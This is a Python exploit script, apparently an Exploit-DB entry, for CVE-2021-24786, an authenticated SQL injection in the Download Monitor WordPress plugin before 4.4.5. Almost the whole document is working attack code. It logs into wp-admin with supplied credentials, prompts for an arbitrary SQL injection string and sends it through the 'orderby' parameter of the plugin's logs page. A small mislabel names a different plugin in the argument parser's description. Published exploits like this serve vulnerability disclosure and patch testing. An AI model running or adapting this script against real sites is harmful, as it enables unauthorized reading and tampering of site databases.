Wordpress Plugin Download Monitor WordPress V 4.4.4 - SQL Injection (Authenticated)

# Exploit Title: Wordpress Plugin Download Monitor WordPress V 4.4.4 - SQL Injection (Authenticated)
# Date 28.01.2022
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: https://www.download-monitor.com/
# Software Link: https://downloads.wordpress.org/plugin/download-monitor.4.4.4.zip
# Version: < 4.4.5
# Tested on: Ubuntu 20.04
# CVE: CVE-2021-24786
# CWE: CWE-89
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24786/README.md

'''
Description:
The Download Monitor WordPress plugin before 4.4.5 does not properly validate and escape the "orderby" GET parameter
before using it in a SQL statement when viewing the logs, leading to an SQL Injection issue
'''

# Banner:
banner = '''

   ___         __    ____   ___ ____  _      ____  _  _ _____ ___   __   
  / __\/\   /\/__\  |___ \ / _ \___ \/ |    |___ \| || |___  ( _ ) / /_  
 / /   \ \ / /_\_____ __) | | | |__) | |_____ __) | || |_ / // _ \| '_ \ 
/ /___  \ V //_|_____/ __/| |_| / __/| |_____/ __/|__   _/ /| (_) | (_) |
\____/   \_/\__/    |_____|\___/_____|_|    |_____|  |_|/_/  \___/ \___/ 
                                                                         
                                  [+] Download Monitor - SQL-Injection
                                  [@] Developed by Ron Jost (Hacker5preme)
'''
print(banner)

import argparse
import requests
from datetime import datetime

# User-Input:
my_parser = argparse.ArgumentParser(description='Wordpress Plugin RegistrationMagic - SQL Injection')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--PATH', type=str)
my_parser.add_argument('-u', '--USERNAME', type=str)
my_parser.add_argument('-p', '--PASSWORD', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
wp_path = args.PATH
username = args.USERNAME
password = args.PASSWORD

print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))

# Authentication:
session = requests.Session()
auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'
check = session.get(auth_url)
# Header:
header = {
    'Host': target_ip,
    'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Origin': 'http://' + target_ip,
    'Connection': 'close',
    'Upgrade-Insecure-Requests': '1'
}

# Body:
body = {
    'log': username,
    'pwd': password,
    'wp-submit': 'Log In',
    'testcookie': '1'
}
auth = session.post(auth_url, headers=header, data=body)

# Exploit (WORKS ONLY IF ONE LOG EXISTS)
print('')
print ('[i] If the exploit does not work, log into wp-admin and add a file and download it to create a log')
print('')
# Generate payload for SQL-Injection
sql_injection_code = input('[+] SQL-INJECTION COMMAND: ')
sql_injection_code = sql_injection_code.replace(' ', '+')
exploitcode_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/edit.php?post_type=dlm_download&page=download-monitor-logs&orderby=download_date`' + sql_injection_code + '`user_id'
exploit = session.get(exploitcode_url)
print(exploit)
print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))